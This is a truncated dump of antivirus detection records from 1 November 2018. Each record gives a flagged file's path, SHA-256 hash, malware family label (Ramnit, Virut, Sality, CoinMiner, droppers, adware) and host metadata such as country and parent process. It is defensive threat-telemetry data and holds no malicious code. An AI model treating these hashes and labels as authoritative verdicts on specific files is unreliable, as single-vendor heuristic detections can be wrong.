  Row(detection=Row(filename='taskeng.exe', filepath='c:\\windows\\system32\\taskeng.exe', filesize=192000, name='TR/Crypt.XPACK.Gen2.#M300.#R100737'), hash='9e70685b73b3eab78c55863babceecc7cca89475b508b2a9c651ade6fde0751a', metadata=Row(cmdline='{EC75E829-B155-491C-AA8C-7CDAA90BF09E} S-1-5-18:NT AUTHORITY\\\\System:Service:', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T13:21:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='g:\\autorun.exe', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9d68807cc4ef56758891c335832bdc903d14ba45201fb94f172317d71d8c776e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='F:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T07:17:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:33:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miraster.dll', filepath='C:\\Program Files (x86)\\MapInfo\\Professional\\MIRASTER.DLL', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='767ec6863200f84d7650290f15ef74bb89b9afa6161edf0ae83ef46e6514ef89', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Update\\1.3.33.17\\GoogleCrashHandler64.exe', parentsize=366160, timestamp='2018-11-01T18:09:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154054-8661223a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_98110d52\\AVSCAN-20181101-154039-841748FA\\AVSCAN-20181101-154054-8661223A', filesize=320000, name='PUA/DomaIQ.Gen.#M300.#R5220'), hash='d31881cdc789f00e315ece2156c3fccd20869901c80285c9fd569b628fff8799', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:40:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0001649.exe', filepath='E:\\System Volume Information\\_restore{69212C0F-784E-4A08-A5CD-0319A60006C2}\\RP2\\A0001649.exe', filesize=384000, name='W64/Infector.Gen8.#M300.#R700674'), hash='601eaac9cfac3a258d87d26d9f46f53a25045419a9dbe7c725f904e73c9bbc58', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:26:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:26:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='libeay32.dll', filepath='d:\\crazykart\\crazykart\\libeay32.dll', filesize=1024000, name='W32/Ramnit.C.#M1.#R1'), hash='83ffe90ba855aecdf5bfc2f21b2708fedd9bde7ea94f8ce25d6cf6abb563c12c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:40:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122237-ae4ca28d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-122209-961C479E\\AVSCAN-20181101-122237-AE4CA28D', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:22:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nssF70B.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/uac', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T02:37:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:20:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='filezilla_3.29.0_win64-setup_bundled (2017_11_17 18_28_02 utc).exe', filepath='\\\\?\\C:\\Users\\X\\OneDrive\\resim\\FileHistory\\HACI METİN\\DESKTOP-HINKLEP\\Data\\C\\Users\\HACI METİN\\Downloads\\FileZilla_3.29.0_win64-setup_bundled (2017_11_17 18_28_02 UTC).exe', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:32:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='launcher.dll', filepath='D:\\GAMES\\ONLINE GAMES\\steam\\steamapps\\common\\Counter-Strike Global Offensive\\bin\\launcher.dll', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='d75f93ad74999547e17e1e0b3c0880499d036a29d5314a17b21159f32bd53618', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe7_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T22:48:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mip.exe', filepath='\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Ink\\mip.exe', filesize=1216000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='bbd4091a14df0b36659c02cc3d781d16be0c6a17572212c2413a513955db0eb7', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:19:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tsmuxer.exe', filepath='C:\\Program Files\\FormatFactory\\FFModules\\Encoder\\tsMuxer.exe', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='b05f7dfc5bbaf271f275eadc3290a47d0dae3335960c819f119bdc85ce1ca73f', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:mcVEe3ZOzEuOEufX.1', country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-01T11:33:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-131002-2a623287', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-130926-0C107F24\\AVSCAN-20181101-131002-2A623287', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:10:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111537-1dc560f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111537-1DC560F7', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:15:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0212024.exe', filepath='C:\\Users\\X\\Desktop\\HD\\A0212024.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='5a2b087a95d0cf17cf33b3b79472c2fb1bc06f49f2343081b879f0b80a2e23a4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe7_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T19:26:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0123812.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0123812.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:41:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vwtester.exe', filepath='C:\\Users\\X\\Desktop\\VAG K+CAN Commander 2.5\\VWTester.exe', filesize=512000, name='TR/Crypt.ZPACK.Gen2.#M300.#R100871'), hash='5d15c8a10de097152559adebf4acac95b4b9b6fbc2fe0670157a1d57b05e38d9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T09:41:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='239f2c85506cf6e390ba59748b42df87f954d10ce36651c6a852bdd0614dbe71', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\239F2C85506CF6E390BA59748B42DF87F954D10CE36651C6A852BDD0614DBE71', filesize=768000, name='W32/Neshta.A.#M1.#R1'), hash='239f2c85506cf6e390ba59748b42df87f954d10ce36651c6a852bdd0614dbe71', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:24:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='D:\\Counter-Strike 1.6 The Low\\Counter-Strike 1.6\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='6cb02c66af17353a6390d54448aad43b764435adaf8f0ecdc575ceb5efad99ca', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T15:41:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172156-619c1a7d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3edb3428\\AVSCAN-20181101-172055-5914E3A8\\AVSCAN-20181101-172156-619C1A7D', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:21:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T18:31:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T17:14:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0113233.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0113233.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:33:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0121722.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0121722.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:40:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201426-fa3e1a69', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ebc89634\\AVSCAN-20181101-195349-801F4AC1\\AVSCAN-20181101-201426-FA3E1A69', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='28bf00a741737599807870c085ab18c6276330bb8107496a7b2c66c691a6cb18', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:14:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-222003-eef9534b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9d35cc67\\AVSCAN-20181101-221502-CA3358FC\\AVSCAN-20181101-222003-EEF9534B', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:20:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-200843-75fdac95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3157b52a\\AVSCAN-20181101-200634-640E435B\\AVSCAN-20181101-200843-75FDAC95', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:08:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:48:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobe acrobat pro dc crack free download.exe', filepath='F:\\ADOBE ACROBAT PRO DC CRACK FREE DOWNLOAD.EXE', filesize=3200000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='1bb0ffcdb763c947cfecccdb30a19ec33491ff48996e9891b25fcf81a6229d02', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T10:26:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0122721.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0122721.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:40:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:42:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='start.exe', filepath='\\\\n5550\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\會計管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='2d9810625653bfddbfe589aa06330e44380be67ed01cc09e73fcb41b2ba52f89', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:dZLJlmOScUes48KI.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:57:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maxmin.exe', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\asas\\bin\\winx64\\maxmin.exe', filesize=4096000, name='W32/Ramnit.CD.#M1.#R1'), hash='4676e9444b7c4c3605b8daa1063467b7e22625a9a7d0d9040dbf1a83c72bdf25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T12:06:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\chon\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='7cea36e5dfa494f024986632c183f2498cca22254c8de274076a89f13bb305ec', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:30:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T09:14:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='กิจกรรมลูกเสือ บคว.exe', filepath='E:\\picture\\กิจกรรมลูกเสือ บคว 53-54\\กิจกรรมลูกเสือ บคว\\กิจกรรมลูกเสือ บคว.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='03d9014d28118f810db440147c7141965db6ab95de59be0afcc27dd3e0c7e46a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:15:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-193250-8b4c64b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e9c4d70a\\AVSCAN-20181101-193113-7A60C979\\AVSCAN-20181101-193250-8B4C64B6', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:32:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mc01010.exe', filepath='C:\\NOVA PASTA\\MCPED10\\BK\\MC01010.EXE', filesize=6080000, name='W32/Sality.AT.#M1.#R1'), hash='9272f64ba6d3ff5aa5199363b1b185f1929a2ec4b45a4762d944964806089fad', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:35:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='corso riqualifica docenti.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\corso riqualifica docenti.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='installe.', filepath='CLICK_HE.APP/CONTENTS/MACOS/INSTALLE.', filesize=196000, name='Adware/OSX.Genieo.lvmpr.#M0.#R0'), hash='b3905883dd74ad5d2e92d9824b8110b0d06a0cf0fd18a36f8bf82ffa0a954a6e', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T23:29:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091803-9fd20220', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_235acee9\\AVSCAN-20181101-091706-95192ACD\\AVSCAN-20181101-091803-9FD20220', filesize=1536000, name='TR/CoinMiner.FS.#M1.#R1'), hash='ceb88ee9dae99f8cbaf2fb4eb6956a2783af3ee8e8bd19e3f74cfa7cf1891546', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:18:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T18:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='b55a26f59e2dd6b1cb53b8f06b64709ac9919c3557192bf3c6b891bc13782044', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\kw5vot2bki3\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:26:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='shareitlenovosupport_3.2.0.526.exe', filepath='C:\\CCAV\\21\\Device\\HarddiskVolume3\\MINECRAFT PE\\SHAREitLENOVOSUPPORT_3.2.0.526.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='bbdf2b390abb97d5bf4b22a885d68c4f455625a45498608dc9d922db929f70e9', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:53:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3286.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3286.tmp', filesize=896000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='f1fdf5a690618f86263b03a073592cd58c12fbca0354d113ecb97bdfe419cc72', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0006958.exe', filepath='\\\\?\\K:\\System Volume Information\\_restore{5C5E2F10-B8E0-4A14-BDD0-47C56E2C74BA}\\RP3\\A0006958.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='8c222d3646ee2e259bff6e961f68d2821cda9804055e61d828ae0d699fd270d2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:19:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d0ff639a2672c1107ce002612be651ed5663218bad857da6435b5b0c0e76d08e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\D0FF639A2672C1107CE002612BE651ED5663218BAD857DA6435B5B0C0E76D08E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d0ff639a2672c1107ce002612be651ed5663218bad857da6435b5b0c0e76d08e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- 